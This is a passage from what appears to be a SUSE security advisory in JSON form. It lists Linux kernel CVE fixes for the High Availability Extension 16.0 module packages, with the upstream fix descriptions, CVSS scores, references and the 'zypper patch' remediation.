"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68783",
"url": "https://www.suse.com/security/cve/CVE-2025-68783"
},
{
"category": "external",
"summary": "SUSE Bug 1256650 for CVE-2025-68783",
"url": "https://bugzilla.suse.com/1256650"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T11:32:45Z",
"details": "moderate"
}
],
"title": "CVE-2025-68783"
},
{
"cve": "CVE-2025-68784",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68784"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nxfs: fix a UAF problem in xattr repair\n\nThe xchk_setup_xattr_buf function can allocate a new value buffer, which\nmeans that any reference to ab-\u003evalue before the call could become a\ndangling pointer. Fix this by moving an assignment to after the buffer\nsetup.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68784",
"url": "https://www.suse.com/security/cve/CVE-2025-68784"
},
{
"category": "external",
"summary": "SUSE Bug 1256793 for CVE-2025-68784",
"url": "https://bugzilla.suse.com/1256793"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 4.7,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:H/UI:N/S:U/C:N/I:L/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T11:32:45Z",
"details": "moderate"
}
],
"title": "CVE-2025-68784"
},
{
"cve": "CVE-2025-68788",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68788"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nfsnotify: do not generate ACCESS/MODIFY events on child for special files\n\ninotify/fanotify do not allow users with no read access to a file to\nsubscribe to events (e.g. IN_ACCESS/IN_MODIFY), but they do allow the\nsame user to subscribe for watching events on children when the user\nhas access to the parent directory (e.g. /dev).\n\nUsers with no read access to a file but with read access to its parent\ndirectory can still stat the file and see if it was accessed/modified\nvia atime/mtime change.\n\nThe same is not true for special files (e.g. /dev/null). Users will not\ngenerally observe atime/mtime changes when other users read/write to\nspecial files, only when someone sets atime/mtime via utimensat().\n\nAlign fsnotify events with this stat behavior and do not generate\nACCESS/MODIFY events to parent watchers on read/write of special files.\nThe events are still generated to parent watchers on utimensat(). This\ncloses some side-channels that could be possibly used for information\nexfiltration [1].\n\n[1] https://snee.la/pdf/pubs/file-notification-attacks.pdf",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68788",
"url": "https://www.suse.com/security/cve/CVE-2025-68788"
},
{
"category": "external",
"summary": "SUSE Bug 1256638 for CVE-2025-68788",
"url": "https://bugzilla.suse.com/1256638"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 4.7,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:N/A:N",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T11:32:45Z",
"details": "moderate"
}
],
"title": "CVE-2025-68788"
},
{
"cve": "CVE-2025-68789",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68789"
}
],
"notes": [
{
"category": "general",
"text": "This CVE ID has been rejected or withdrawn by its CVE Numbering Authority.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68789",
"url": "https://www.suse.com/security/cve/CVE-2025-68789"
},
{
"category": "external",
"summary": "SUSE Bug 1256781 for CVE-2025-68789",
"url": "https://bugzilla.suse.com/1256781"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 4.7,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:H/UI:N/S:U/C:N/I:L/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T11:32:45Z",
"details": "moderate"
}
],
"title": "CVE-2025-68789"
},
{
"cve": "CVE-2025-68792",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68792"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\ntpm2-sessions: Fix out of range indexing in name_size\n\n\u0027name_size\u0027 does not have any range checks, and it just directly indexes\nwith TPM_ALG_ID, which could lead into memory corruption at worst.\n\nAddress the issue by only processing known values and returning -EINVAL for\nunrecognized values.\n\nMake also \u0027tpm_buf_append_name\u0027 and \u0027tpm_buf_fill_hmac_session\u0027 fallible so\nthat errors are detected before causing any spurious TPM traffic.\n\nEnd also the authorization session on failure in both of the functions, as\nthe session state would be then by definition corrupted.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68792",
"url": "https://www.suse.com/security/cve/CVE-2025-68792"
},
{
"category": "external",
"summary": "SUSE Bug 1256656 for CVE-2025-68792",
"url": "https://bugzilla.suse.com/1256656"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 6.3,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:H/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T11:32:45Z",
"details": "moderate"
}
],
"title": "CVE-2025-68792"
},
{
"cve": "CVE-2025-68795",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68795"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nethtool: Avoid overflowing userspace buffer on stats query\n\nThe ethtool -S command operates across three ioctl calls:\nETHTOOL_GSSET_INFO for the size, ETHTOOL_GSTRINGS for the names, and\nETHTOOL_GSTATS for the values.\n\nIf the number of stats changes between these calls (e.g., due to device\nreconfiguration), userspace\u0027s buffer allocation will be incorrect,\npotentially leading to buffer overflow.\n\nDrivers are generally expected to maintain stable stat counts, but some\ndrivers (e.g., mlx5, bnx2x, bna, ksz884x) use dynamic counters, making\nthis scenario possible.\n\nSome drivers try to handle this internally:\n- bnad_get_ethtool_stats() returns early in case stats.n_stats is not\n equal to the driver\u0027s stats count.\n- micrel/ksz884x also makes sure not to write anything beyond\n stats.n_stats and overflow the buffer.\n\nHowever, both use stats.n_stats which is already assigned with the value\nreturned from get_sset_count(), hence won\u0027t solve the issue described\nhere.\n\nChange ethtool_get_strings(), ethtool_get_stats(),\nethtool_get_phy_stats() to not return anything in case of a mismatch\nbetween userspace\u0027s size and get_sset_size(), to prevent buffer\noverflow.\nThe returned n_stats value will be equal to zero, to reflect that\nnothing has been returned.\n\nThis could result in one of two cases when using upstream ethtool,\ndepending on when the size change is detected:\n1. When detected in ethtool_get_strings():\n # ethtool -S eth2\n no stats available\n\n2. When detected in get stats, all stats will be reported as zero.\n\nBoth cases are presumably transient, and a subsequent ethtool call\nshould succeed.\n\nOther than the overflow avoidance, these two cases are very evident (no\noutput/cleared stats), which is arguably better than presenting\nincorrect/shifted stats.\nI also considered returning an error instead of a \"silent\" response, but\nthat seems more destructive towards userspace apps.\n\nNotes:\n- This patch does not claim to fix the inherent race, it only makes sure\n that we do not overflow the userspace buffer, and makes for a more\n predictable behavior.\n\n- RTNL lock is held during each ioctl, the race window exists between\n the separate ioctl calls when the lock is released.\n\n- Userspace ethtool always fills stats.n_stats, but it is likely that\n these stats ioctls are implemented in other userspace applications\n which might not fill it. The added code checks that it\u0027s not zero,\n to prevent any regressions.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68795",
"url": "https://www.suse.com/security/cve/CVE-2025-68795"
},
{
"category": "external",
"summary": "SUSE Bug 1256688 for CVE-2025-68795",
"url": "https://bugzilla.suse.com/1256688"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.8,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:L/I:L/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T11:32:45Z",
"details": "moderate"
}
],
"title": "CVE-2025-68795"
},
{
"cve": "CVE-2025-68797",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68797"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nchar: applicom: fix NULL pointer dereference in ac_ioctl\n\nDiscovered by Atuin - Automated Vulnerability Discovery Engine.\n\nIn ac_ioctl, the validation of IndexCard and the check for a valid\nRamIO pointer are skipped when cmd is 6. However, the function\nunconditionally executes readb(apbs[IndexCard].RamIO + VERS) at the\nend.\n\nIf cmd is 6, IndexCard may reference a board that does not exist\n(where RamIO is NULL), leading to a NULL pointer dereference.\n\nFix this by skipping the readb access when cmd is 6, as this\ncommand is a global information query and does not target a specific\nboard context.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68797",
"url": "https://www.suse.com/security/cve/CVE-2025-68797"
},
{
"category": "external",
"summary": "SUSE Bug 1256660 for CVE-2025-68797",
"url": "https://bugzilla.suse.com/1256660"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
